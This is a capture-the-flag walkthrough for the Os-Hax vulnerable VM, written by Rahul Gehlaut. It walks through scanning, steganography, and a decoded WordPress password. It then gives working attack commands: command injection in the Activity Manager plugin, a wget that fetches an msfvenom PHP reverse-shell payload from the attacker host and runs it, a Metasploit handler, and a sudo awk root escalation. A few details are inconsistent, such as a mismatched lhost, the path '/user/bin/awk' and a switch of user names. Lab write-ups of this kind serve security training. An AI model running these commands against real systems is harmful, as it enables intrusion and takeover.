Today we are solving Os-Hax Walkthrough for and this CTF is designed by.. Rahul Gehlaut

You can download here. (Os-Hax Walkthrough)
Level: Intermediate
Boot to Root
Tool Used
- Netdiscover
- Dirb
- Nmap
- ExifTool
- Metasploit
Find of All IP We did this using the Netdiscover command

we can continue to our second step that is scanning the target With Nmap Aggressive scan
nmap -A 192.168.1.31

Type your machine IP in the web browser

Without wasting time enumerate the Directory
Enumerate the Directory With Dirb
dirb http://192.168.1.31

And Found some directory you will navigate to the following URL
http://192.168.1.31/img
And Find A Our First Flag

Now Download Image file flaghost.png
Data Exfiltration-Steganography
Now After Download the image Extract-Data Image

And Find Next Hint found a directory passw@4514
After Open the directory find the Flag2.txt
Open the file Flag2.txt

And Find Brain-Fuck Encode Code
And After Decode the Coad Find A WordPress Password
Decoder Website https://www.splitbrain.org/_static/ook/
Username: web
Password: Hacker@4514
Next Step is Add a host file some Text

Vi /etc/hosts
After Add, My CTF IP and localhost Save the file
And Open Follow the URL Find a WordPress Page
http://localhost/wordpress
Without waste a time open the WordPress login panel
http://localhost/wordpress/wp-login.php

And login with already found password
And after login WordPress Found a vulnerable Plugin Activity Manager

And open Activity Manager tool found a command injection
Let’s Check the command
127.0.0.1 |id
And this is working after the command I see the output

After Check command injection work and create our payload with Metasploit
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.2 lport=4545 -f raw

open vi editor save the output text payload.php
create a Python Server
python -m SimpleHTTPServer

wget command download our payload target machine

First, remove maxlenght=15 to 100 inspect element
127.0.0.1 | wget http://192.168.1.2:8000/payload.php


Execute our payload this command 127.0.0.1 | php payload.php

Msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.1
set lport 4545
run
And got a reverse connection

First import python for proper shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’



cd /home
ls
cd web
ls
and I see our 3 flag
cat flag.txt
Privilege Escalation


For finding the 4th flag we need to escalate root privilege, let’s identify sudo rights for Alice with the help of the following command.
sudo -l
So here Alice can run awk as root without using the password and we can easily spawn root shell by exploiting this permission
sudo /user/bin/awk 'BEGIN {system("/bin/bash")}'
id
cd /root
ls
cat final.txt

FLAG 4: COMPLETE! Congratulations
Author Name: Rahul Gehlaut see more blog here








